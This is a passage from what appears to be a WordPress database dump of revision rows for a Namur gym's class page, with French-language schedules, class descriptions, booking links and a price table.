class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">16h30</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">Réservé Squash</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">17h30</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcardio\">Cardio</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcore\">Core</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">18h15</td>\r\n<td class=\"tvide\">Réservé Squash</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tforce\">Force</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h00</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"ttrx\">TRX</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"ttrx\">TRX/Cardio</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h45</td>\r\n<td class=\"tvide\">Bootcamp</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tvide\">Réservé Foot</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #9FEDAC;\">Circuit Training</span> : Entraînement sur un circuit ultra complet, fun et adapté à votre niveau. Ce circuit utilise tous les outils.\r\n\r\n<span style=\"text-decoration: underline; background: #9FC6ED;\">Cardio</span> : Entraînement développant votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et pour perdre du poids (en complément avec un programme alimentaire) !\r\n\r\n<span style=\"text-decoration: underline; background: #EDE99F;\">TRX</span> : Entraînement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l’intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #ED9FEA;\">Psychomotricité</span> : Séance réservée aux enfants de 3 à 6 ans.\r\n\r\n<span style=\"text-decoration: underline; background: #ED9FA2;\">Force</span> : Entraînement basé sur le travail de la force pure avec ou sans prise de masse (Kettlebel, barre, haltère,…)<b> </b>\r\n\r\n<span style=\"text-decoration: underline; background: #A2A186;\">Core</span> : Entraînement basé sur le travail du centre du corps (« core »). Nous enchaînerons les exercices sur les muscles abdominaux, dorsaux, fessiers,…\r\n\r\n<span style=\"text-decoration: underline; background: #EDE99F;\">TRX/Cardio</span> : Entraînement croisé entre le TRX et le cardio. Vous travaillerez ici votre endurance et votre renforcement musculaire global.\r\n\r\n&nbsp;\r\n<h1></h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Small Group Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Séance Booster</td>\r\n<td class=\"tcelluleprix\">20.00€ (Sur rendez-vous)\r\n30 min : 10 min de bilan + 20 min de découverte avec un coach en personal training</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Personal Training</td>\r\n<td class=\"tcelluleprix\">60 min : 60.00€<br>30 min : 35.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Duo Training</td>\r\n<td class=\"tcelluleprix\">60 min : 35.00€<br>30 min : 20.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Small Group Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 10.00€<br>1 carte de 10 séances : 90.00€ (valable 6 mois)<br>1 carte de 20 séances : 150.00€ (valable 6 mois)<br>1 carte de 50 séances : 300.00€ (valable 1 an)<br></td>\r\n</tr>\r\n\r\n<tr>\r\n<td class=\"ttitrehprix\">Préparation physique</td>\r\n<td class=\"tcelluleprix\">1 séance : 40.00€<br>Séance de 30 min orientée sur les spécificités du sport</td>\r\n</tr>\r\n\r\n\r\n\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + coaching nutritionnel pendant 3 mois = 235.00€</td>\r\n</tr>\r\n\r\n\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-08-31 08:47:00', '2014-08-31 08:47:00', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(458, 1, '2014-08-31 08:51:39', '2014-08-31 08:51:39', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1>&nbsp;</h1>\r\n<h1>Small Group Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 pers.). Nous vous proposons 7 types de séances décrites ci-dessous.\r\nPour suivre les cours de Small Group Training, vous devez d\'abord vous inscrire à une <a title=\"Séance booster\" href=\"http://www.crosstrainingcenter.be/266-2/\">séance Booster</a>. Cette séance, sur rendez-vous individuel, avec un coach durera 30 minutes. Durant cette séance, un bilan sera réalisé ainsi qu\'une découverte de l\'ensemble des outils du Cross Training Center.\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">Heure</td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">15h30</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tpsychomot\">Psychomotricité</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">16h30</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">Réservé Squash</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">17h30</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcardio\">Cardio</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcore\">Core</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">18h15</td>\r\n<td class=\"tvide\">Réservé Squash</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tforce\">Force</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h00</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"ttrx\">TRX</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"ttrx\">TRX/Cardio</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h45</td>\r\n<td class=\"tvide\">Bootcamp</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tvide\">Réservé Foot</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #9FEDAC;\">Circuit Training</span> : Entraînement sur un circuit ultra complet, fun et adapté à votre niveau. Ce circuit utilise tous les outils.\r\n\r\n<span style=\"text-decoration: underline; background: #9FC6ED;\">Cardio</span> : Entraînement développant votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et pour perdre du poids (en complément avec un programme alimentaire) !\r\n\r\n<span style=\"text-decoration: underline; background: #EDE99F;\">TRX</span> : Entraînement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l’intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #ED9FEA;\">Psychomotricité</span> : Séance réservée aux enfants de 3 à 6 ans.\r\n\r\n<span style=\"text-decoration: underline; background: #ED9FA2;\">Force</span> : Entraînement basé sur le travail de la force pure avec ou sans prise de masse (Kettlebel, barre, haltère,…)<b> </b>\r\n\r\n<span style=\"text-decoration: underline; background: #A2A186;\">Core</span> : Entraînement basé sur le travail du centre du corps (« core »). Nous enchaînerons les exercices sur les muscles abdominaux, dorsaux, fessiers,…\r\n\r\n<span style=\"text-decoration: underline; background: #EDE99F;\">TRX/Cardio</span> : Entraînement croisé entre le TRX et le cardio. Vous travaillerez ici votre endurance et votre renforcement musculaire global.\r\n\r\n&nbsp;\r\n<h1>&nbsp;</h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Small Group Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1>&nbsp;</h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1>&nbsp;</h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1>&nbsp;</h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1>&nbsp;</h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Séance Booster</td>\r\n<td class=\"tcelluleprix\">20.00€ (Sur rendez-vous)\r\n30 min : 10 min de bilan + 20 min de découverte avec un coach en personal training</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Personal Training</td>\r\n<td class=\"tcelluleprix\">60 min : 60.00€<br>30 min : 35.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Duo Training</td>\r\n<td class=\"tcelluleprix\">60 min : 35.00€<br>30 min : 20.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Small Group Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 10.00€<br>1 carte de 10 séances : 90.00€ (valable 6 mois)<br>1 carte de 20 séances : 150.00€ (valable 6 mois)<br>1 carte de 50 séances : 300.00€ (valable 1 an)<br></td>\r\n</tr>\r\n\r\n<tr>\r\n<td class=\"ttitrehprix\">Préparation physique</td>\r\n<td class=\"tcelluleprix\">1 séance : 40.00€<br>Séance de 30 min orientée sur les spécificités du sport</td>\r\n</tr>\r\n\r\n\r\n\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + coaching nutritionnel pendant 3 mois = 235.00€</td>\r\n</tr>\r\n\r\n\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-08-31 08:51:39', '2014-08-31 08:51:39', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(462, 1, '2014-12-15 19:40:28', '2014-12-15 19:40:28', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Small Group Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 pers.). Nous vous proposons 7 types de séances décrites ci-dessous.\r\nPour suivre les cours de Small Group Training, vous devez d\'abord vous inscrire à une <a title=\"Séance booster\" href=\"http://www.crosstrainingcenter.be/266-2/\">séance Booster</a>. Cette séance, sur rendez-vous individuel, avec un coach durera 30 minutes. Durant cette séance, un bilan sera réalisé ainsi qu\'une découverte de l\'ensemble des outils du Cross Training Center.\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">Heure</td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">16h45</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills.png\"><img class=\"alignnone  wp-image-461\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills.png\" width=\"58\" height=\"17\" /></a></td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">17h30</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcore\">Core</td>\r\n<td class=\"ttrx\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">18h15</td>\r\n<td class=\"tvide\">Réservé Squash</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tforce\">Force</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h00</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"ttrx\">TRX</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tvide\">LesMills</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h45</td>\r\n<td class=\"tvide\">LesMilles</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tvide\">Réservé Foot</td>\r\n<td class=\"tvide\">LesMilles</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">20h30</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">Duo Training</td>\r\n<td class=\"tvide\">LesMills</td>\r\n<td class=\"tvide\">Duo Training</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #9FEDAC;\">Circuit Training</span> : Entraînement sur un circuit ultra complet, fun et adapté à votre niveau. Ce circuit utilise tous les outils.\r\n\r\n<span style=\"text-decoration: underline; background: #EDE99F;\">TRX</span> : Entraînement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l’intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #ED9FA2;\">Force</span> : Entraînement basé sur le travail de la force pure avec ou sans prise de masse (Kettlebel, barre, haltère,…)<b> </b>\r\n\r\n<span style=\"text-decoration: underline; background: #A2A186;\">Core</span> : Entraînement basé sur le travail du centre du corps (« core »). Nous enchaînerons les exercices sur les muscles abdominaux, dorsaux, fessiers,…\r\n\r\n&nbsp;\r\n<h1></h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Small Group Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Séance Booster</td>\r\n<td class=\"tcelluleprix\">20.00€ (Sur rendez-vous)\r\n30 min : 10 min de bilan + 20 min de découverte avec un coach en personal training</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Personal Training</td>\r\n<td class=\"tcelluleprix\">60 min : 60.00€\r\n30 min : 35.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Duo Training</td>\r\n<td class=\"tcelluleprix\">60 min : 35.00€\r\n30 min : 20.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Small Group Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 10.00€\r\n1 carte de 10 séances : 90.00€ (valable 6 mois)\r\n1 carte de 20 séances : 150.00€ (valable 6 mois)\r\n1 carte de 50 séances : 300.00€ (valable 1 an)</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Préparation physique</td>\r\n<td class=\"tcelluleprix\">1 séance : 40.00€\r\nSéance de 30 min orientée sur les spécificités du sport</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + coaching nutritionnel pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-12-15 19:40:28', '2014-12-15 19:40:28', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(460, 1, '2014-12-15 19:36:41', '2014-12-15 19:36:41', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Small Group Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 pers.). Nous vous proposons 7 types de séances décrites ci-dessous.\r\nPour suivre les cours de Small Group Training, vous devez d\'abord vous inscrire à une <a title=\"Séance booster\" href=\"http://www.crosstrainingcenter.be/266-2/\">séance Booster</a>. Cette séance, sur rendez-vous individuel, avec un coach durera 30 minutes. Durant cette séance, un bilan sera réalisé ainsi qu\'une découverte de l\'ensemble des outils du Cross Training Center.\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">Heure</td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">16h45</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">LesMills</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">17h30</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcore\">Core</td>\r\n<td class=\"ttrx\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">18h15</td>\r\n<td class=\"tvide\">Réservé Squash</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tforce\">Force</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h00</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"ttrx\">TRX</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tvide\">LesMills</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h45</td>\r\n<td class=\"tvide\">LesMilles</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tvide\">Réservé Foot</td>\r\n<td class=\"tvide\">LesMilles</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">20h30</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">Duo Training</td>\r\n<td class=\"tvide\">LesMills</td>\r\n<td class=\"tvide\">Duo Training</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #9FEDAC;\">Circuit Training</span> : Entraînement sur un circuit ultra complet, fun et adapté à votre niveau. Ce circuit utilise tous les outils.\r\n\r\n<span style=\"text-decoration: underline; background: #9FC6ED;\">Cardio</span> : Entraînement développant votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et pour perdre du poids (en complément avec un programme alimentaire) !\r\n\r\n<span style=\"text-decoration: underline; background: #EDE99F;\">TRX</span> : Entraînement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l’intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #ED9FEA;\">Psychomotricité</span> : Séance réservée aux enfants de 3 à 6 ans.\r\n\r\n<span style=\"text-decoration: underline; background: #ED9FA2;\">Force</span> : Entraînement basé sur le travail de la force pure avec ou sans prise de masse (Kettlebel, barre, haltère,…)<b> </b>\r\n\r\n<span style=\"text-decoration: underline; background: #A2A186;\">Core</span> : Entraînement basé sur le travail du centre du corps (« core »). Nous enchaînerons les exercices sur les muscles abdominaux, dorsaux, fessiers,…\r\n\r\n<span style=\"text-decoration: underline; background: #EDE99F;\">TRX/Cardio</span> : Entraînement croisé entre le TRX et le cardio. Vous travaillerez ici votre endurance et votre renforcement musculaire global.\r\n\r\n&nbsp;\r\n<h1></h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Small Group Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Séance Booster</td>\r\n<td class=\"tcelluleprix\">20.00€ (Sur rendez-vous)\r\n30 min : 10 min de bilan + 20 min de découverte avec un coach en personal training</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Personal Training</td>\r\n<td class=\"tcelluleprix\">60 min : 60.00€\r\n30 min : 35.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Duo Training</td>\r\n<td class=\"tcelluleprix\">60 min : 35.00€\r\n30 min : 20.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Small Group Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 10.00€\r\n1 carte de 10 séances : 90.00€ (valable 6 mois)\r\n1 carte de 20 séances : 150.00€ (valable 6 mois)\r\n1 carte de 50 séances : 300.00€ (valable 1 an)</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Préparation physique</td>\r\n<td class=\"tcelluleprix\">1 séance : 40.00€\r\nSéance de 30 min orientée sur les spécificités du sport</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + coaching nutritionnel pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-12-15 19:36:41', '2014-12-15 19:36:41', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(463, 1, '2014-12-15 19:41:10', '2014-12-15 19:41:10', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Small Group Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 pers.). Nous vous proposons 7 types de séances décrites ci-dessous.\r\nPour suivre les cours de Small Group Training, vous devez d\'abord vous inscrire à une <a title=\"Séance booster\" 